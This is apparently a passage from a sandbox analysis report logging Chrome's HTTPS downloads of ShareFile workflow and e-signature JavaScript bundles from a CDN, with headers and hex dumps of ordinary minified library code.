                                                                                                                                                                                                                      Data Ascii: ports=a},2076:t=>{"use strict";t.exports=o},2965:t=>{"use strict";t.exports=u},8109:t=>{"use strict";t.exports=c},3145:(t,e,n)=>{"use strict";function r(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=Array(e);n<e;n++)r[n]=t[n];return r}n.d(e,{A:()
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC15108INData Raw: 2c 22 73 69 67 6e 61 6c 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 73 3f 28 74 68 69 73 2e 61 62 6f 72 74 53 69 67 6e 61 6c 43 6f 6e 73 75 6d 65 64 3d 21 30 2c 73 2e 73 69 67 6e 61 6c 29 3a 75 6e 64 65 66 69 6e 65 64 7d 29 7d 3b 75 28 61 29 3b 63 6f 6e 73 74 20 63 3d 7b 66 65 74 63 68 4f 70 74 69 6f 6e 73 3a 65 2c 6f 70 74 69 6f 6e 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 71 75 65 72 79 4b 65 79 3a 74 68 69 73 2e 71 75 65 72 79 4b 65 79 2c 73 74 61 74 65 3a 74 68 69 73 2e 73 74 61 74 65 2c 66 65 74 63 68 46 6e 3a 28 29 3d 3e 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 71 75 65 72 79 46 6e 3f 28 74 68 69 73 2e 61 62 6f 72 74 53 69 67 6e 61 6c 43 6f 6e 73 75 6d 65 64 3d 21 31 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 71 75 65
                                                                                                                                                                                                                      Data Ascii: ,"signal",{enumerable:!0,get:()=>s?(this.abortSignalConsumed=!0,s.signal):undefined})};u(a);const c={fetchOptions:e,options:this.options,queryKey:this.queryKey,state:this.state,fetchFn:()=>this.options.queryFn?(this.abortSignalConsumed=!1,this.options.que
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC13284INData Raw: 73 2e 6d 75 74 61 74 69 6f 6e 44 65 66 61 75 6c 74 73 2e 66 69 6e 64 28 28 65 3d 3e 28 30 2c 6f 2e 43 70 29 28 74 2c 65 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 29 29 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 7d 64 65 66 61 75 6c 74 51 75 65 72 79 4f 70 74 69 6f 6e 73 28 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 74 26 26 74 2e 5f 64 65 66 61 75 6c 74 65 64 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 65 3d 7b 2e 2e 2e 74 68 69 73 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 2e 71 75 65 72 69 65 73 2c 2e 2e 2e 74 68 69 73 2e 67 65 74 51 75 65 72 79 44 65 66 61 75 6c 74 73 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 71 75 65 72 79 4b 65 79 29 2c 2e 2e 2e 74 2c 5f 64 65 66 61 75
                                                                                                                                                                                                                      Data Ascii: s.mutationDefaults.find((e=>(0,o.Cp)(t,e.mutationKey)));return null==e?void 0:e.defaultOptions}defaultQueryOptions(t){if(null!=t&&t._defaulted)return t;const e={...this.defaultOptions.queries,...this.getQueryDefaults(null==t?void 0:t.queryKey),...t,_defau


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      19192.168.2.174973713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC606OUTGET /sharefile-web/sharefiledev-workflows-pilet/0.120.9/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 1482911
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 25 Oct 2024 17:10:41 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "514d63f3f284bf031a2efd85cf5d7027"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4b3bed207ec72204ebc89ae818e573ee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: pY5ElUmoFsQQ5VqtKsYe00TiaZDk7q36DvEemMIOeEbYF7B1hnKApw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 77 6f 72 6b 66 6c 6f 77 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 2c 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{})System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},a={},i={},s={},l={},c={};retu
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65 79 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 28 75 3d 4f 62 6a 65 63
                                                                                                                                                                                                                      Data Ascii: numerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function c(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function u(){return(u=Objec
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 22 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 22 29 2b 65 3b 63 61 73 65 20 36 30 36 30 3a 72 65 74 75 72 6e 20 50 2b 22 62 6f 78 2d 22 2b 6c 28 65 2c 22 2d 67 72 6f 77 22 2c 22 22 29 2b 50 2b 65 2b 48 2b 6c 28 65 2c 22 67 72 6f 77 22 2c 22 70 6f 73 69 74 69 76 65 22 29 2b 65 3b 63 61 73 65 20 34 35 35 34 3a 72 65 74 75 72 6e 20 50 2b 6c 28 65 2c 2f 28 5b 5e 2d 5d 29 28 74 72 61 6e 73 66 6f 72 6d 29 2f 67 2c 22 24 31 22 2b 50 2b 22 24 32 22 29 2b 65 3b 63 61 73 65 20 36 31 38 37 3a 72 65 74 75 72 6e 20 6c 28 6c 28 6c 28 65 2c 2f 28 7a 6f 6f 6d 2d 7c 67 72 61 62 29 2f 2c 50 2b 22 24 31 22 29 2c 2f 28 69 6d 61 67 65 2d 73 65 74 29 2f 2c 50 2b 22 24 31 22 29 2c 65 2c 22 22 29 2b 65 3b 63 61 73 65 20 35 34 39 35 3a 63 61 73 65 20 33 39 35 39 3a 72 65 74 75 72
                                                                                                                                                                                                                      Data Ascii: "preferred-size")+e;case 6060:return P+"box-"+l(e,"-grow","")+P+e+H+l(e,"grow","positive")+e;case 4554:return P+l(e,/([^-])(transform)/g,"$1"+P+"$2")+e;case 6187:return l(l(l(e,/(zoom-|grab)/,P+"$1"),/(image-set)/,P+"$1"),e,"")+e;case 5495:case 3959:retur
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC15108INData Raw: 65 2e 5f 5f 65 6d 6f 74 69 6f 6e 5f 73 74 79 6c 65 73 2e 73 6c 69 63 65 28 30 29 3a 5b 5d 3b 69 66 28 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 79 2e 70 75 73 68 28 22 6c 61 62 65 6c 3a 22 2b 6e 2b 22 3b 22 29 2c 6e 75 6c 6c 3d 3d 67 5b 30 5d 7c 7c 67 5b 30 5d 2e 72 61 77 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 79 2e 70 75 73 68 2e 61 70 70 6c 79 28 79 2c 67 29 3b 65 6c 73 65 7b 30 2c 79 2e 70 75 73 68 28 67 5b 30 5d 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 77 3d 67 2e 6c 65 6e 67 74 68 2c 62 3d 31 3b 62 3c 77 3b 62 2b 2b 29 79 2e 70 75 73 68 28 67 5b 62 5d 2c 67 5b 30 5d 5b 62 5d 29 7d 76 61 72 20 4d 3d 28 30 2c 69 2e 77 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 76 26 26 65 2e 61 73 7c 7c 75 2c 63 3d 22 22 2c 68 3d 5b 5d
                                                                                                                                                                                                                      Data Ascii: e.__emotion_styles.slice(0):[];if(n!==undefined&&y.push("label:"+n+";"),null==g[0]||g[0].raw===undefined)y.push.apply(y,g);else{0,y.push(g[0][0]);for(var w=g.length,b=1;b<w;b++)y.push(g[b],g[0][b])}var M=(0,i.w)((function(e,t,n){var o=v&&e.as||u,c="",h=[]
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC143INData Raw: 27 22 2c 73 79 6d 62 6f 6c 5f 72 65 66 65 72 65 6e 63 65 64 5f 62 65 66 6f 72 65 5f 64 65 63 6c 61 72 61 74 69 6f 6e 3a 22 42 6c 6f 63 6b 2d 73 63 6f 70 65 64 20 73 79 6d 62 6f 6c 20 27 7b 7b 73 79 6d 62 6f 6c 4e 61 6d 65 7d 7d 27 20 75 73 65 64 20 62 65 66 6f 72 65 20 69 74 73 20 64 65 63 6c 61 72 61 74 69 6f 6e 22 2c 74 72 69 67 67 65 72 5f 76 61 72 69 61 62 6c 65 73 3a 7b 6e 61 6d 65 5f 63 6c 61 73 68 3a 22 54 68 65 72 65
                                                                                                                                                                                                                      Data Ascii: '",symbol_referenced_before_declaration:"Block-scoped symbol '{{symbolName}}' used before its declaration",trigger_variables:{name_clash:"There
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 27 73 20 61 6c 72 65 61 64 79 20 61 20 76 61 72 69 61 62 6c 65 20 77 69 74 68 20 74 68 69 73 20 6e 61 6d 65 22 2c 6e 61 6d 65 5f 72 65 71 75 69 72 65 64 3a 22 56 61 72 69 61 62 6c 65 20 6e 61 6d 65 20 69 73 20 61 20 72 65 71 75 69 72 65 64 20 66 69 65 6c 64 22 7d 2c 75 6e 65 78 70 65 63 74 65 64 5f 61 72 72 61 79 5f 74 79 70 65 3a 22 52 65 63 65 69 76 65 64 20 75 6e 65 78 70 65 63 74 65 64 20 7b 7b 41 72 72 61 79 7d 7d 20 74 79 70 65 22 2c 75 6e 6b 6e 6f 77 6e 3a 22 75 6e 6b 6e 6f 77 6e 22 7d 7d 7d 2c 7b 6b 65 79 3a 22 65 73 22 2c 63 6f 6e 74 65 6e 74 3a 7b 65 72 72 6f 72 73 3a 7b 61 72 67 75 6d 65 6e 74 73 3a 7b 66 69 65 6c 64 5f 72 65 71 75 69 72 65 64 3a 22 45 73 74 65 20 63 61 6d 70 6f 20 65 73 20 6f 62 6c 69 67 61 74 6f 72 69 6f 22 2c 72 65 71 75 69
                                                                                                                                                                                                                      Data Ascii: 's already a variable with this name",name_required:"Variable name is a required field"},unexpected_array_type:"Received unexpected {{Array}} type",unknown:"unknown"}}},{key:"es",content:{errors:{arguments:{field_required:"Este campo es obligatorio",requi
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC7892INData Raw: 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3e 3e 74 7d 2c 22 3e 3e 3e 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3e 3e 3e 74 7d 2c 22 2b 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 74 7d 2c 22 2d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2d 74 7d 2c 22 2a 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2a 74 7d 2c 22 2f 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2f 74 7d 2c 22 25 22 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 25 74 7d 7d 2c 6c 65 3d 7b 22 2d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2d 65 7d 2c 22 2b 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65
                                                                                                                                                                                                                      Data Ascii: ion(e,t){return e>>t},">>>":function(e,t){return e>>>t},"+":function(e,t){return e+t},"-":function(e,t){return e-t},"*":function(e,t){return e*t},"/":function(e,t){return e/t},"%":function(e,t){return e%t}},le={"-":function(e){return-e},"+":function(e){re
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 65 74 75 72 6e 20 74 3d 74 68 69 73 2e 63 6f 64 65 2c 66 65 2e 69 73 49 64 65 6e 74 69 66 69 65 72 53 74 61 72 74 28 74 29 3f 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 22 56 61 72 69 61 62 6c 65 20 6e 61 6d 65 73 20 63 61 6e 6e 6f 74 20 73 74 61 72 74 20 77 69 74 68 20 61 20 6e 75 6d 62 65 72 20 28 22 2b 6e 2b 74 68 69 73 2e 63 68 61 72 2b 22 29 22 29 3a 28 74 3d 3d 3d 66 65 2e 50 45 52 49 4f 44 5f 43 4f 44 45 7c 7c 31 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 26 26 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 3d 3d 3d 66 65 2e 50 45 52 49 4f 44 5f 43 4f 44 45 29 26 26 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 70 65 72 69 6f 64 22 29 2c 7b 74 79 70 65 3a 66 65 2e 4c 49 54 45 52 41 4c 2c 76 61 6c 75 65 3a 70 61 72 73
                                                                                                                                                                                                                      Data Ascii: eturn t=this.code,fe.isIdentifierStart(t)?this.throwError("Variable names cannot start with a number ("+n+this.char+")"):(t===fe.PERIOD_CODE||1===n.length&&n.charCodeAt(0)===fe.PERIOD_CODE)&&this.throwError("Unexpected period"),{type:fe.LITERAL,value:pars
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC2180INData Raw: 65 74 20 73 3d 7b 61 72 67 73 3a 5b 5d 2c 6f 72 69 67 69 6e 61 6c 46 6f 72 6d 61 74 3a 22 75 6e 6b 6e 6f 77 6e 22 2c 65 72 72 6f 72 73 3a 5b 5d 7d 2c 6c 3d 5b 5d 2c 63 3d 5b 5d 3b 69 66 28 6e 29 69 66 28 72 74 28 6e 29 29 6c 3d 6e 2c 73 2e 6f 72 69 67 69 6e 61 6c 46 6f 72 6d 61 74 3d 22 6e 61 6d 65 2d 76 61 6c 75 65 22 3b 65 6c 73 65 20 74 72 79 7b 6c 3d 79 65 28 6e 29 2c 73 2e 6f 72 69 67 69 6e 61 6c 46 6f 72 6d 61 74 3d 22 6f 62 6a 65 63 74 22 7d 63 61 74 63 68 28 6f 65 29 7b 63 2e 70 75 73 68 28 6e 65 77 20 74 65 28 47 2e 49 6e 76 61 6c 69 64 41 72 67 75 6d 65 6e 74 46 6f 72 6d 61 74 2c 72 3d 3d 3d 43 65 2e 54 72 69 67 67 65 72 43 6f 6e 74 65 78 74 41 72 67 75 6d 65 6e 74 3f 4b 2e 52 55 4e 54 49 4d 45 3a 4b 2e 44 45 53 49 47 4e 2c 4a 2e 45 52 52 4f 52
                                                                                                                                                                                                                      Data Ascii: et s={args:[],originalFormat:"unknown",errors:[]},l=[],c=[];if(n)if(rt(n))l=n,s.originalFormat="name-value";else try{l=ye(n),s.originalFormat="object"}catch(oe){c.push(new te(G.InvalidArgumentFormat,r===Ce.TriggerContextArgument?K.RUNTIME:K.DESIGN,J.ERROR
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 76 61 72 20 69 3b 69 66 28 21 6e 26 26 6f 21 3d 3d 53 65 2e 62 6f 6f 6c 65 61 6e 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 63 6f 6e 73 74 20 73 3d 5a 65 28 6f 29 3b 69 66 28 73 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 2e 6d 61 70 28 28 6e 3d 3e 24 65 28 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 4b 65 28 65 2c 74 2c 6e 2c 72 2c 73 2c 61 29 7d 29 29 29 29 29 7d 72 65 74 75 72 6e 20 61 2e 70 75 73 68 28 6e 65 77 20 74 65 28 47 2e 49 6e 76 61 6c 69 64 41 72 72 61 79 41 72 67
                                                                                                                                                                                                                      Data Ascii: d 0,void 0,(function*(){var i;if(!n&&o!==Se.boolean)return undefined;const s=Ze(o);if(s){if(Array.isArray(n)){return yield Promise.all(n.map((n=>$e(void 0,void 0,void 0,(function*(){return yield Ke(e,t,n,r,s,a)})))))}return a.push(new te(G.InvalidArrayArg


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      20192.168.2.174973413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC602OUTGET /sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 775350
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 29 Oct 2024 06:47:49 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "67dd564568419099f49ebded11913e6c"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 1b0117d337408839a32bf2a49b55b3f0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 808Ya06jS2QrFORec1FjNwjPcSJr0pOOY7ssdeZ1Dabd0FDiVynk-Q==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 73 69 67 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 74 72 69 6b 65 74 68 72 6f 75 67 68 50 6f 73 69 74 69 6f 6e 7c 73 74 72 69 6b 65 74 68 72 6f 75 67 68 54 68 69 63 6b 6e 65 73 73 7c 73 74 72 69 6e 67 7c 73 74 72 6f 6b 65 7c 73 74 72 6f 6b 65 44 61 73 68 61 72 72 61 79 7c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 7c 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 7c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 7c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 7c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 7c 73 74 72 6f 6b 65 57 69 64 74 68 7c 73 75 72 66 61 63 65 53 63 61 6c 65 7c 73 79 73 74 65 6d 4c 61 6e 67 75 61 67 65 7c 74 61 62 6c 65 56 61 6c 75 65 73 7c 74 61 72 67 65 74 58 7c 74 61 72 67 65 74 59 7c 74 65 78 74 41 6e 63 68 6f 72 7c 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 7c 74 65 78 74 52 65 6e 64 65 72
                                                                                                                                                                                                                      Data Ascii: trikethroughPosition|strikethroughThickness|string|stroke|strokeDasharray|strokeDashoffset|strokeLinecap|strokeLinejoin|strokeMiterlimit|strokeOpacity|strokeWidth|surfaceScale|systemLanguage|tableValues|targetX|targetY|textAnchor|textDecoration|textRender
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 32 35 25 20 7b 5c 6e 5c 74 5c 74 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 5c 6e 5c 74 7d 5c 6e 5c 74 35 30 25 20 7b 5c 6e 5c 74 5c 74 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 5c 6e 5c 74 7d 5c 6e 5c 74 37 35 25 20 7b 5c 6e 5c 74 5c 74 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 5c 6e 5c 74 7d 5c 6e 22 5d 29 29 29 2c 43 3d 28 30 2c 62 2e 41 29 28 79 29 28 61 7c 7c 28 61 3d 28 30 2c 68 2e 41 29 28 5b 22 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 22 2c 22 3b 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 30 2e 37 73 3b 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 20 69
                                                                                                                                                                                                                      Data Ascii: 25% {\n\t\ttransform: rotate(90deg);\n\t}\n\t50% {\n\t\ttransform: rotate(180deg);\n\t}\n\t75% {\n\t\ttransform: rotate(270deg);\n\t}\n"]))),C=(0,b.A)(y)(a||(a=(0,h.A)(["\n\tanimation-name: ",";\n\tanimation-duration: 0.7s;\n\tanimation-iteration-count: i
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 43 69 72 63 6c 65 53 6f 6c 69 64 49 63 6f 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 23 34 41 39 39 31 32 22 3b 72 65 74 75 72 6e 20 69 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 7b 22 64 61 74 61 2d 72 65 70 6c 61 63 65 2d 63 6f 6c 6f 72 22 3a 74 2c 77 69 64 74 68 3a 22 32 34 22 2c 68 65 69 67 68 74 3a 22 32 34 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 7d 2c 69 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74
